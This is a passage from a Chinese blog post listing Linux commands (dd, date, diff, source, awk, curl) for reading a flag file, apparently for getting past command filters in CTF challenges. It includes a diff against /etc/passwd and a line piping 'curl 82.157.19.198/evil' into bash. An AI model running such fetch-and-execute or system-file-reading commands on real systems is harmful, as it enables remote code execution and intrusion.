<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">dd</span> <span class="keyword">if</span>=flag.txt <span class="comment"># 需要完整文件名</span></span><br></pre></td></tr></table></figure>

<h3 id="date"><a href="#date" class="headerlink" title="date"></a><code>date</code></h3><blockquote>
<p> 打印或设置系统日期和时间并且能够将日期和时间戳相互转换</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">date</span> -f f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124205325419.png" alt="image-20260124205325286"></p>
<h3 id="diff"><a href="#diff" class="headerlink" title="diff"></a><code>diff</code></h3><blockquote>
<p>比较给定的两个文件的不同</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diff f* /etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260124205656690.png" alt="image-20260124205656554"></p>
<h3 id="source"><a href="#source" class="headerlink" title="source"></a><code>source</code></h3><blockquote>
<p>在当前Shell环境中从指定文件读取和执行命令。</p>
<p>该命令通常用命令“.”来替代。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126175156750.png" alt="image-20260126175156557"></p>
<h3 id="awk"><a href="#awk" class="headerlink" title="awk"></a><code>awk</code></h3><blockquote>
<p>awk 是一种处理文本文件的语言，是一个强大的文本分析工具。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk options <span class="string">&#x27;pattern &#123;action&#125;&#x27;</span> file</span><br></pre></td></tr></table></figure></blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk <span class="string">&#x27;&#123;print&#125;&#x27;</span> f*</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126180248292.png" alt="image-20260126180248155"></p>
<h3 id="curl"><a href="#curl" class="headerlink" title="curl"></a><code>curl</code></h3><blockquote>
<p>一个利用URL规则在命令行下工作的文件传输工具</p>
<p>它支持文件的上传和下载</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl 82.157.19.198/evil |bash</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/lierbushiwo/image/20260126182055358.png" alt="image-20260126182055217"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/lierbushiwo">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">各种读取文件的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#xxd"><span class="toc-number">1.1.</span> <span class="toc-text">xxd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#od"><span class="toc-number">1.2.</span> <span class="toc-text">od</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hexdump"><span class="toc-number">1.3.</span> <span class="toc-text">hexdump</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cut"><span class="toc-number">1.4.</span> <span class="toc-text">cut</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#tee"><span class="toc-number">1.5.</span> <span class="toc-text">tee</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#grep"><span class="toc-number">1.6.</span> <span class="toc-text">grep</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#file"><span class="toc-number">1.7.</span> <span class="toc-text">file</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sed"><span class="toc-number">1.8.</span> <span class="toc-text">sed</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#paste"><span class="toc-number">1.9.</span> <span class="toc-text">paste</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dd"><span class="toc-number">1.10.</span> <span class="toc-text">dd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#date"><span class="toc-number">1.11.</span> <span class="toc-text">date</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#diff"><span class="toc-number">1.12.</span> <span class="toc-text">diff</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#source"><span class="toc-number">1.13.</span> <span class="toc-text">source</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#awk"><span class="toc-number">1.14.</span> <span class="toc-text">awk</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#curl"><span class="toc-number">1.15.</span> <span class="toc-text">curl</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&text=Linux各种读取文件的命令"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&is_video=false&description=Linux各种读取文件的命令"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Linux各种读取文件的命令&body=Check out this article: http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&title=Linux各种读取文件的命令"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&name=Linux各种读取文件的命令&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2026/01/28/Linux%E5%90%84%E7%A7%8D%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E5%91%BD%E4%BB%A4/&t=Linux各种读取文件的命令"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/lierbushiwo">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
